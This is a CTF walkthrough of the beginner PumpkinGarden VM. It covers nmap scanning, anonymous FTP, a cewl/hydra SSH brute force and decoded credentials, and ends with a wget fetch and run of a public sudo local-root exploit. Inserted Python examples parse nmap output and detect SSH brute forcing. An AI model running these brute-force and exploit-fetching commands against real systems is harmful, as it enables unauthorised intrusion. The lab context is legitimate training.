PumpkinGarden Walkthrough

Jayanth
7 min read · Jun 14, 2019


Mission-Pumpkin v1.0 is a beginner-level CTF series that I created with absolute beginners in mind. This CTF series is for people who have basic knowledge of hacking tools and techniques but are struggling to apply those tools. My motivation for creating this series is to encourage beginners to learn the concepts by solving problems.

Here is the walkthrough for PumpkinGarden, Level 1 in the Mission-Pumpkin series. Like all other CTF or Boot2Root challenges, the end goal is to find the PumpkinGarden_Key file placed in the root user's home directory.

You can download the VM (.ova) from here.

Upon booting the machine, the welcome banner displays its IP address, so there is no need to perform a network scan.

First, let’s perform an nmap scan to identify the services running on the machine.

root@kali:~# nmap -p- -A 192.168.1.102
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-14 11:06 IST
Nmap scan report for 192.168.1.102
Host is up (0.00039s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 88 Jun 13 00:02 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.1.107
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
1515/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Mission-Pumpkin
3535/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d8:8d:e7:48:3a:3c:91:0e:3f:43:ea:a3:05:d8:89:e2 (DSA)
| 2048 f0:41:8f:e0:40:e3:c0:3a:1f:4d:4f:93:e6:63:24:9e (RSA)
| 256 fa:87:57:1b:a2:ba:92:76:0c:e7:85:e7:f5:3d:54:b1 (ECDSA)
|_ 256 fa:e8:42:5a:88:91:b4:4b:eb:e4:c3:74:2e:23:a5:45 (ED25519)
MAC Address: 08:00:27:5C:1B:D9 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.39 ms 192.168.1.102
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.19 seconds

Nmap identified three services: FTP, SSH and HTTP. Let’s try the low-hanging fruit first: anonymous FTP login is allowed, so let’s log in with the username anonymous and a blank password.
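As an added example (not part of the original walkthrough), the following Python script parses nmap's normal-output format, as printed above, into structured port records and turns them into the findings a defender would act on: anonymous FTP, a plaintext protocol, and services moved to non-standard ports that a full -p- scan still finds. The scan text embedded in it is copied from the report above; the STANDARD_PORT table and the wording of the findings are my own.

```python
"""Parse nmap's normal output into structured ports and flag what a defender
should fix. Added example; the scan text is taken from the report above."""
import re
from typing import Dict, List

SAMPLE_SCAN = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 88 Jun 13 00:02 note.txt
1515/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Mission-Pumpkin
3535/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
STANDARD_PORT = {"ftp": 21, "ssh": 22, "http": 80}  # IANA defaults for the services seen

def parse_nmap(text: str) -> List[Dict]:
    """One dict per port line, with the NSE script lines printed under it."""
    ports: List[Dict] = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            ports.append({"port": int(port), "proto": proto, "state": state,
                          "service": service, "version": version, "scripts": []})
        elif line.startswith("|") and ports:
            # "| " continues a script block, "|_" closes it; keep only the text
            ports[-1]["scripts"].append(line.lstrip("|_ ").rstrip())
    return ports

def triage(ports: List[Dict]) -> List[str]:
    """Turn parsed ports into findings a defender can act on."""
    findings: List[str] = []
    for p in ports:
        if p["state"] != "open":
            continue
        tag = f"{p['port']}/{p['proto']} {p['service']}"
        if any("Anonymous FTP login allowed" in s for s in p["scripts"]):
            exposed = [s.split()[-1] for s in p["scripts"] if s.startswith("-")]
            findings.append(f"{tag}: anonymous login enabled, exposes {exposed}")
        if p["service"] == "ftp":
            findings.append(f"{tag}: plaintext protocol, credentials and files unencrypted")
        std = STANDARD_PORT.get(p["service"])
        if std is not None and std != p["port"]:
            findings.append(f"{tag}: non-standard port, still found by a -p- scan")
    return findings
```

Run `triage(parse_nmap(SAMPLE_SCAN))` to get the four findings for this box; feed it the output of your own `nmap -A` run to triage a different host.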

root@kali:~# ftp 192.168.1.102
Connected to 192.168.1.102.
220 Welcome to Pumpkin’s FTP service.
Name (192.168.1.102:root): anonymous
331 Please specify the password.
Password:
230 Login successful.

Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 88 Jun 8 00:02 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (88 bytes).
226 Transfer complete.
88 bytes received in 0.00 secs (51.1228 kB/s)
ftp> bye
221 Goodbye.

We found a note.txt file; let’s read its contents.

root@kali:~# cat note.txt 
Hello Dear!
Looking for route map to pumpkin garden? I think jack can help you find it.

Based on the note, jack can help us, so let’s get back to the list of services running on the machine. We can probably log in to SSH as jack, but we don’t have any clue about the password, so let’s create a wordlist with cewl and use it to brute-force the SSH login. cewl retrieves words from the website running on port 1515 (HTTP).

cewl http://192.168.1.102:1515 -w wordlist.txt

Now that the wordlist is ready, let’s brute-force port 3535 (SSH) using hydra.

hydra -l jack -P wordlist.txt ssh://192.168.1.102 -s 3535

Hydra found jack’s SSH password. Let’s log in to SSH as jack.
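Added example, not from the original walkthrough: the banner on this machine says remote connections are monitored, and a password-guessing run like the hydra step above leaves a clear pattern in sshd's auth log. This Python detector counts failed logins per source within a time window and flags a subsequent password success from the same source; the log lines are constructed in the auth.log format Ubuntu's sshd writes, and the threshold, window and year values are assumptions.

```python
"""Spot an online SSH password-guessing run (like the hydra step above) in sshd
auth logs. Added example, not from the walkthrough; log lines are constructed."""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple

# Constructed sample in the syslog format sshd writes to /var/log/auth.log.
SAMPLE_LOG = """\
Jun 14 11:20:01 Pumpkin sshd[2101]: Failed password for jack from 192.168.1.107 port 40001 ssh2
Jun 14 11:20:01 Pumpkin sshd[2102]: Failed password for jack from 192.168.1.107 port 40002 ssh2
Jun 14 11:20:02 Pumpkin sshd[2103]: Failed password for jack from 192.168.1.107 port 40003 ssh2
Jun 14 11:20:02 Pumpkin sshd[2104]: Failed password for jack from 192.168.1.107 port 40004 ssh2
Jun 14 11:20:03 Pumpkin sshd[2105]: Failed password for jack from 192.168.1.107 port 40005 ssh2
Jun 14 11:20:03 Pumpkin sshd[2106]: Accepted password for jack from 192.168.1.107 port 40006 ssh2
Jun 14 11:35:10 Pumpkin sshd[2300]: Accepted publickey for goblin from 192.168.1.50 port 50100 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def detect_bruteforce(log: str, threshold: int = 5, window_s: int = 60) -> List[Tuple[str, str]]:
    """Return (source_ip, verdict) pairs for sources with at least `threshold`
    failed logins inside `window_s` seconds, noting whether a success followed."""
    failures: Dict[str, List[datetime]] = defaultdict(list)
    verdicts: Dict[str, str] = {}
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year; assume a fixed one (2019) for ordering
        ts = datetime.strptime("2019 " + m["ts"], "%Y %b %d %H:%M:%S")
        ip = m["ip"]
        if m["result"] == "Failed":
            recent = [t for t in failures[ip] if (ts - t).total_seconds() <= window_s]
            recent.append(ts)
            failures[ip] = recent
            if len(recent) >= threshold:
                verdicts[ip] = f"{len(recent)} failed logins for {m['user']} within {window_s}s"
        elif ip in verdicts and m["method"] == "password":
            verdicts[ip] += f"; then ACCEPTED password for {m['user']} (likely compromised)"
    return sorted(verdicts.items())

if __name__ == "__main__":
    for ip, verdict in detect_bruteforce(SAMPLE_LOG):
        print(ip, verdict)
```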

root@kali:~# ssh -p 3535 jack@192.168.1.102
--------------------------------------------------------------------
Welcome to Mission-Pumpkin
All remote connections to this machine are monitored and recorded
--------------------------------------------------------------------
jack@192.168.1.102's password:
Last login: Thu Jun 8 00:58:39 2019
jack@Pumpkin:~$ ls
note.txt
jack@Pumpkin:~$ cat note.txt
Are you here for keys to pumpkin garden?
I'm afraid that scarecrow has just stolen the keys from me...

Again we found a note.txt file after logging in as jack, with a clue to contact scarecrow. The only option we have is to search for the next clue on the website.

What is under the hood? 🤔 Let’s view the page source.

The comment in the page source tells us to look for the next clue in the pumpkin images. We can use dirb to enumerate web directories.

root@kali:~# dirb http://192.168.1.102:1515
-----------------
DIRB v2.22
By The Dark Raver
-----------------
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.102:1515/ ----
==> DIRECTORY: http://192.168.1.102:1515/img/
+ http://192.168.1.102:1515/index.html (CODE:200|SIZE:903)
+ http://192.168.1.102:1515/server-status (CODE:403|SIZE:295)

---- Entering directory: http://192.168.1.102:1515/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

We are allowed to list the contents of the img directory.

In this location, the hidden_secrect directory contains a clue.txt file. The content of this file is a base64-encoded string. Let’s decode it.

root@kali:~# echo c2NhcmVjcm93IDogNVFuQCR5 | base64 -d
scarecrow : 5Qn@$y

This looks like username : password.

We have the scarecrow’s credentials. Let’s log in to SSH with the above details.

root@kali:~# ssh -p 3535 scarecrow@192.168.1.102
--------------------------------------------------------------------
Welcome to Mission-Pumpkin
All remote connections to this machine are monitored and recorded
--------------------------------------------------------------------
scarecrow@192.168.1.102's password:
Last login: Thu Jun 8 00:35:51 2019 from 192.168.1.106
scarecrow@Pumpkin:~$ ls
note.txt
scarecrow@Pumpkin:~$ cat note.txt
Oops!!! I just forgot; keys to the garden are with LordPumpkin(ROOT user)!
Reach out to goblin and share this "Y0n$M4sy3D1t" to secretly get keys from LordPumpkin.

Again we found a note.txt file after logging in as scarecrow, with a clue to contact goblin and share Y0n$M4sy3D1t. Let’s log in to SSH with these details.

root@kali:~# ssh -p 3535 goblin@192.168.1.102
--------------------------------------------------------------------
Welcome to Mission-Pumpkin
All remote connections to this machine are monitored and recorded
--------------------------------------------------------------------
goblin@192.168.1.102's password:
Last login: Thu Jun 8 00:43:14 2019 from 192.168.1.106
goblin@Pumpkin:~$ ls
note
goblin@Pumpkin:~$ cat note
Hello Friend! I heard that you are looking for PumpkinGarden key.
But Key to the garden will be with LordPumpkin(ROOT user), don't worry, I know where LordPumpkin had placed the Key.
You can reach there through my backyard.
Here is the key to my backyard
https://www.securityfocus.com/data/vulnerabilities/exploits/38362.sh

Finally, we reached a place where we found a way to gain root access. It’s time to escalate privileges. Click here to understand the details about the vulnerability.

Let’s download the exploit code from the given link using wget.

wget https://www.securityfocus.com/data/vulnerabilities/exploits/38362.sh

We need to make the script executable before running it to gain root access.

goblin@Pumpkin:~$ chmod +x 38362.sh 
goblin@Pumpkin:~$ ./38362.sh 38362.sh
Tod Miller Sudo local root exploit
by Slouching
automated by kingcope
ALEX-ALEX
root@Pumpkin:/tmp# cd
root@Pumpkin:~# ls
PumpkinGarden_Key
root@Pumpkin:~# cat PumpkinGarden_Key
Q29uZ3JhdHVsYXRpb25zIQ==
root@Pumpkin:~# echo Q29uZ3JhdHVsYXRpb25zIQ== | base64 -d
Congratulations!

Yippee! Finally, we found the key to PumpkinGarden.

There are many other ways to reach this point in less time, but my intention is to cover as many techniques as possible. Thanks for taking the time to root this machine. I’ll be back soon with a walkthrough for Mission-Pumpkin v1.0 level 2.

If you enjoyed rooting this machine, give it a 👏. I’d love to hear from you; drop your feedback and suggestions in the comments.
